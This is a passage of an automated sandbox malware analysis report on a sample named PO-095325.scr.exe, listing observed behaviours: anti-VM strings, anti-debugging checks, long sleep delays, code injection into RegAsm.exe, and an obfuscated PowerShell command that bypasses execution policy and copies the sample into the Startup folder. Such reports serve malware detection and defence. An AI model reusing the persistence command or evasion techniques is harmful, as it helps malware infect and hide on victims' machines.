                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599325Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599198Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598216Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597559Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596905Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594783Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594547Jump to behavior
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: svchost.exe, 00000005.00000002.3637630206.000002143CE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: svchost.exe, 00000005.00000002.3638166008.0000021442459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: RegAsm.exe, 00000004.00000002.4468158129.00000000064E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01607ED0 CheckRemoteDebuggerPresent,4_2_01607ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 106C008
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" ??????????-??????????e??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????p??????????o??????????l??????????i??????????c??????????y?????????? ??????????b??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????c?????????o?????????p?????????y?????????-?????????i?????????t?????????e?????????m 'c:\users\user\desktop\po-095325.scr.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\command-line.exe'
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" ??????????-??????????e??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????p??????????o??????????l??????????i??????????c??????????y?????????? ??????????b??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????c?????????o?????????p?????????y?????????-?????????i?????????t?????????e?????????m 'c:\users\user\desktop\po-095325.scr.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\command-line.exe'
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Queries volume information: C:\Users\user\Desktop\PO-095325.scr.exe VolumeInformation
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
